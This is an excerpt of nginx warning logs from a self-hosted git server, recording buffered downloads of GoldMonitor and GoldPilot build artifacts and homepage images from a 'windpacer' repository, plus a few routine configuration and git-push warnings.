"https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/build/GoldMonitor/PYZ-00.pyz" +2026/02/17 18:54:23 [warn] 929#929: *84711 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/92/0000015923 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/PYZ-00.pyz" +2026/02/17 18:56:36 [warn] 929#929: *85716 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/92/0000015924 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldPilot/dist/GoldMonitor.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldPilot/dist/GoldMonitor.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist/GoldMonitor.exe" +2026/02/17 18:56:45 [warn] 929#929: *85716 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/5/92/0000015925 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldPilot/dist/AssetPilot.exe HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldPilot/dist/AssetPilot.exe", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldPilot/dist/AssetPilot.exe" +2026/02/17 19:42:09 [warn] 931#931: *90771 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/6/92/0000015926 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/gold_monitor_full/gold_monitor_full.pkg" +2026/02/17 19:49:46 [warn] 931#931: *91777 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/7/92/0000015927 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" +2026/02/17 19:50:23 [warn] 931#931: *91777 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/8/92/0000015928 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" +2026/02/17 19:51:27 [warn] 931#931: *91777 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/9/92/0000015929 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.3/GoldMonitor_V5.3.pkg" +2026/02/17 19:51:30 [warn] 931#931: *91777 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/0/93/0000015930 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.2/GoldMonitor_V5.2.pkg" +2026/02/17 19:51:32 [warn] 931#931: *91777 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/1/93/0000015931 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/windpacer/raw/branch/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/GoldMonitor/build/GoldMonitor_V5.1/GoldMonitor_V5.1.pkg" +2026/02/17 19:51:42 [warn] 931#931: *91777 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/2/93/0000015932 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" +2026/02/17 19:52:53 [warn] 931#931: *91777 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/3/93/0000015933 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=800", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/index.html" +2026/02/17 19:52:59 [warn] 931#931: *91777 an upstream response is buffered to a temporary file /var/cache/nginx/proxy_temp/4/93/0000015934 while reading upstream, client: 74.7.227.38, server: git.hanmocnn.co.kr, request: "GET /windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000 HTTP/2.0", upstream: "http://192.168.0.250:3000/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000", host: "git.hanmocnn.co.kr", referrer: "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" +2026/02/18 03:30:53 [warn] 941#941: *93643 using uninitialized "server" variable while logging request, client: 45.92.1.85, server: git.hanmocnn.co.kr +2026/02/18 14:28:20 [warn] 961#961: *100638 a client request body is buffered to a temporary file /tmp/nginx/body/9/07/0000019079, client: 222.117.41.51, server: git.hanmocnn.co.kr, request: "POST /windpacer/homepage.git/git-receive-pack HTTP/2.0", host: "git.hanmocnn.co.kr" +2026/02/18 20:55:11 [warn] 973#973: *100954 using uninitialized "server" variable while logging request, client: 45.92.1.85, server: git.hanmocnn.co.kr